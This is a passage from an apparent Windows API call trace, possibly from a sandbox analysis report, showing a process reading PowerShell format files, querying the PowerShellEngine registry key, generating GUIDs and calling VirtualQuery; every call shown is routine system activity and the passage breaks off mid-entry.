[0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 [0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 [0026.723] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.723] GetLastError () returned 0x0 [0026.724] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.724] GetLastError () returned 0x0 [0026.724] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.724] GetLastError () returned 0x0 [0026.726] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.726] GetLastError () returned 0x0 [0026.726] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0xbce, lpOverlapped=0x0) returned 1 [0026.726] GetLastError () returned 0x0 [0026.726] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8082, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8082*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.726] GetLastError () returned 0x0 [0026.726] ReadFile (in: hFile=0x2f8, lpBuffer=0x22e8914, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x22e8914*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.726] GetLastError () returned 0x0 [0026.726] CloseHandle (hObject=0x2f8) returned 1 [0026.726] GetLastError () returned 0x0 [0026.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.726] GetLastError () returned 0x0 [0026.726] SetErrorMode (uMode=0x1) returned 0x1 [0026.726] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2309910 | out: lpFileInformation=0x2309910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0026.726] GetLastError () returned 0x0 [0026.727] SetErrorMode (uMode=0x1) returned 0x1 [0026.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.727] GetLastError () returned 0x0 [0026.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.727] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.727] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.727] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.727] GetLastError () returned 0x0 [0026.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0026.727] GetLastError () returned 0x0 [0026.730] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x11ac695e, Data2=0xda5e, Data3=0x4924, Data4=([0]=0x96, [1]=0x3f, [2]=0xd1, [3]=0x36, [4]=0xcf, [5]=0x19, [6]=0x99, [7]=0x3))) returned 0x0 [0026.731] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2556f40, Data2=0x572f, Data3=0x4f78, Data4=([0]=0x92, [1]=0x8c, [2]=0xd3, [3]=0x81, [4]=0xf7, [5]=0x79, [6]=0xf1, [7]=0x60))) returned 0x0 [0026.731] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x16795c7c, Data2=0x79f4, Data3=0x43fc, Data4=([0]=0x82, [1]=0xf5, [2]=0x3a, [3]=0xb1, [4]=0x1b, [5]=0x8f, [6]=0xa6, [7]=0xd8))) returned 0x0 [0026.731] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xa2d7bc67, Data2=0xc2a7, Data3=0x4ace, Data4=([0]=0xb0, [1]=0x3c, [2]=0x0, [3]=0xf7, [4]=0xf6, [5]=0x86, [6]=0x7f, [7]=0xc5))) returned 0x0 [0026.731] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5aeb7bb7, Data2=0x82a5, Data3=0x4469, Data4=([0]=0xb5, [1]=0xc7, [2]=0x46, [3]=0xdf, [4]=0xba, [5]=0xbc, [6]=0xd3, [7]=0xb2))) returned 0x0 [0026.731] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x8a47f58f, Data2=0x76c8, Data3=0x4139, Data4=([0]=0x9b, [1]=0x8, [2]=0xc9, [3]=0x50, [4]=0x6a, [5]=0x60, [6]=0xe4, [7]=0xda))) returned 0x0 [0026.731] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.732] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc3ecc9eb, Data2=0x241a, Data3=0x4d56, Data4=([0]=0xb3, [1]=0x45, [2]=0xff, [3]=0x6, [4]=0x8c, [5]=0x5e, [6]=0xf5, [7]=0x74))) returned 0x0 [0026.732] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.732] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.732] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe0382f9e, Data2=0x128b, Data3=0x4ae1, Data4=([0]=0xa0, [1]=0x20, [2]=0x71, [3]=0x81, [4]=0x1f, [5]=0xce, [6]=0xac, [7]=0x3e))) returned 0x0 [0026.732] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xdaba6dfd, Data2=0x6b68, Data3=0x4ad8, Data4=([0]=0x9e, [1]=0x8e, [2]=0x96, [3]=0x44, [4]=0xa4, [5]=0x78, [6]=0x50, [7]=0xc6))) returned 0x0 [0026.733] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf6a77afa, Data2=0xac99, Data3=0x47a1, Data4=([0]=0x96, [1]=0x84, [2]=0x2f, [3]=0xb, [4]=0x19, [5]=0x8b, [6]=0xc2, [7]=0x31))) returned 0x0 [0026.733] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2d23720, Data2=0x4494, Data3=0x4a19, Data4=([0]=0xb5, [1]=0x8c, [2]=0xc3, [3]=0x4d, [4]=0x7a, [5]=0xa4, [6]=0x9, [7]=0x45))) returned 0x0 [0026.733] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.733] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x893282e8, Data2=0x7e52, Data3=0x4ca0, Data4=([0]=0xa8, [1]=0xe1, [2]=0x0, [3]=0xc3, [4]=0xb9, [5]=0x8b, [6]=0x26, [7]=0x28))) returned 0x0 [0026.733] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.733] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.734] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.734] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.735] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.735] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2ab16159, Data2=0xe204, Data3=0x4f86, Data4=([0]=0xb0, [1]=0xb6, [2]=0xa, [3]=0xbf, [4]=0xf3, [5]=0x7b, [6]=0xbc, [7]=0x93))) returned 0x0 [0026.736] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc5d70dc, Data2=0x230e, Data3=0x42b3, Data4=([0]=0x90, [1]=0xfe, [2]=0x79, [3]=0x5b, [4]=0x2d, [5]=0x2, [6]=0xde, [7]=0x80))) returned 0x0 [0026.736] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x92e142c2, Data2=0xe7b7, Data3=0x4bb4, Data4=([0]=0x8f, [1]=0xee, [2]=0x6b, [3]=0xd7, [4]=0x49, [5]=0x77, [6]=0x30, [7]=0x97))) returned 0x0 [0026.736] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf8da7187, Data2=0xed94, Data3=0x4850, Data4=([0]=0xa4, [1]=0x5a, [2]=0x67, [3]=0x2e, [4]=0x37, [5]=0x4a, [6]=0x0, [7]=0x5b))) returned 0x0 [0026.736] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xb963aeb1, Data2=0x4c5d, Data3=0x44f7, Data4=([0]=0x9c, [1]=0x7c, [2]=0x49, [3]=0xf2, [4]=0x3b, [5]=0x6e, [6]=0xff, [7]=0xca))) returned 0x0 [0026.736] VirtualQuery (in: lpAddress=0x1cd264, lpBuffer=0x1ce264, dwLength=0x1c | out: lpBuffer=0x1ce264*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.736] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1d0afd3b, Data2=0x9541, Data3=0x43d9, Data4=([0]=0x85, [1]=0x64, [2]=0x75, [3]=0xa2, [4]=0x38, [5]=0xc1, [6]=0x71, [7]=0x65))) returned 0x0 [0026.737] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1f8facac, Data2=0xa315, Data3=0x4ca3, Data4=([0]=0x8e, [1]=0xc2, [2]=0x5a, [3]=0x5, [4]=0xcb, [5]=0xe5, [6]=0x40, [7]=0x90))) returned 0x0 [0026.737] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5a56548d, Data2=0x90f3, Data3=0x4449, Data4=([0]=0xa3, [1]=0xf1, [2]=0x2f, [3]=0x1b, [4]=0x2, [5]=0x49, [6]=0xf5, [7]=0x92))) returned 0x0 [0026.737] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xaf29dfbd, Data2=0x7d99, Data3=0x434b, Data4=([0]=0xb5, [1]=0x8c, [2]=0x1c, [3]=0x4e, [4]=0x9e, [5]=0x15, [6]=0x56, [7]=0x19))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xeac680b1, Data2=0xc93d, Data3=0x46b4, Data4=([0]=0xa0, [1]=0x16, [2]=0x7, [3]=0xdf, [4]=0xee, [5]=0x29, [6]=0x28, [7]=0xa0))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x92de23eb, Data2=0x5a8d, Data3=0x4d52, Data4=([0]=0x9a, [1]=0x38, [2]=0x76, [3]=0x56, [4]=0xf7, [5]=0x55, [6]=0x79, [7]=0x3d))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x643da0fb, Data2=0xcfc, Data3=0x4516, Data4=([0]=0xa0, [1]=0x7e, [2]=0x4a, [3]=0xeb, [4]=0x9f, [5]=0x3b, [6]=0x8e, [7]=0x9f))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x3d6fe943, Data2=0x830c, Data3=0x40b1, Data4=([0]=0xad, [1]=0x97, [2]=0x44, [3]=0x5f, [4]=0x96, [5]=0xa6, [6]=0x66, [7]=0x20))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x50b8da58, Data2=0x31f, Data3=0x403e, Data4=([0]=0xad, [1]=0x8a, [2]=0x52, [3]=0x51, [4]=0xe2, [5]=0x74, [6]=0xa9, [7]=0xa8))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xcf13b2ec, Data2=0x1d17, Data3=0x4512, Data4=([0]=0xb0, [1]=0xa8, [2]=0x25, [3]=0xf0, [4]=0x8, [5]=0xcf, [6]=0xf3, [7]=0x35))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x74b9fc23, Data2=0xaabc, Data3=0x4e35, Data4=([0]=0x91, [1]=0xb, [2]=0x1a, [3]=0x56, [4]=0xee, [5]=0xf1, [6]=0x1, [7]=0xa8))) returned 0x0 [0026.738] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x4afa9b03, Data2=0xca04, Data3=0x422f, Data4=([0]=0xbd, [1]=0x65, [2]=0x24, [3]=0x73, [4]=0x61, [5]=0x1c, [6]=0xa2, [7]=0xfe))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1cd94a0a, Data2=0x86a6, Data3=0x4bdd, Data4=([0]=0x85, [1]=0xaf, [2]=0x62, [3]=0x22, [4]=0x54, [5]=0x4f, [6]=0x4f, [7]=0x5e))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xa0fad874, Data2=0xdb1c, Data3=0x44cf, Data4=([0]=0x82, [1]=0x9a, [2]=0x8d, [3]=0xd6, [4]=0xd3, [5]=0x69, [6]=0x12, [7]=0x6d))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xd6ee0a69, Data2=0x3ace, Data3=0x4506, Data4=([0]=0xb3, [1]=0xa9, [2]=0xf3, [3]=0x4b, [4]=0xf5, [5]=0xad, [6]=0xf3, [7]=0x3f))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x9a6a68c2, Data2=0x2112, Data3=0x494e, Data4=([0]=0x9d, [1]=0x21, [2]=0x4c, [3]=0x44, [4]=0x6e, [5]=0x27, [6]=0x86, [7]=0x4d))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xf5afc6b2, Data2=0x40ba, Data3=0x430a, Data4=([0]=0x8d, [1]=0x66, [2]=0x34, [3]=0x89, [4]=0xcb, [5]=0x57, [6]=0x21, [7]=0xcb))) returned 0x0 [0026.739] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x78df488e, Data2=0xd1a0, Data3=0x4753, Data4=([0]=0x98, [1]=0x35, [2]=0x80, [3]=0x49, [4]=0xb4, [5]=0xdb, [6]=0xd1, [7]=0x96))) returned 0x0 [0026.740] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe78294e9, Data2=0x4dc1, Data3=0x4bdc, Data4=([0]=0x8c, [1]=0xcc, [2]=0xbf, [3]=0xa6, [4]=0xf, [5]=0xf, [6]=0xc6, [7]=0xc7))) returned 0x0 [0026.740] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.740] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.742] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.743] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x17b7e172, Data2=0xe2ff, Data3=0x48cf, Data4=([0]=0x84, [1]=0x94, [2]=0xf4, [3]=0x4, [4]=0x6e, [5]=0xf7, [6]=0x73, [7]=0x16))) returned 0x0 [0026.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.744] GetLastError () returned 0x0 [0026.744] SetErrorMode (uMode=0x1) returned 0x1 [0026.744] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.744] GetLastError () returned 0x0 [0026.744] GetFileType (hFile=0x2f8) returned 0x1 [0026.744] SetErrorMode (uMode=0x1) returned 0x1 [0026.744] GetFileType (hFile=0x2f8) returned 0x1 [0026.744] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.746] GetLastError () returned 0x0 [0026.746] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.746] GetLastError () returned 0x0 [0026.747] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.747] GetLastError () returned 0x0 [0026.747] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.747] GetLastError () returned 0x0 [0026.748] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.748] GetLastError () returned 0x0 [0026.748] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.748] GetLastError () returned 0x0 [0026.748] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x119, lpOverlapped=0x0) returned 1 [0026.748] GetLastError () returned 0x0 [0026.748] ReadFile (in: hFile=0x2f8, lpBuffer=0x23a67fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x23a67fc*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.748] GetLastError () returned 0x0 [0026.748] CloseHandle (hObject=0x2f8) returned 1 [0026.748] GetLastError () returned 0x0 [0026.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.748] GetLastError () returned 0x0 [0026.748] SetErrorMode (uMode=0x1) returned 0x1 [0026.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23c77f8 | out: lpFileInformation=0x23c77f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0026.749] GetLastError () returned 0x0 [0026.749] SetErrorMode (uMode=0x1) returned 0x1 [0026.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.749] GetLastError () returned 0x0 [0026.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.749] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.749] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.749] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.749] GetLastError () returned 0x0 [0026.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0026.749] GetLastError () returned 0x0 [0026.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, 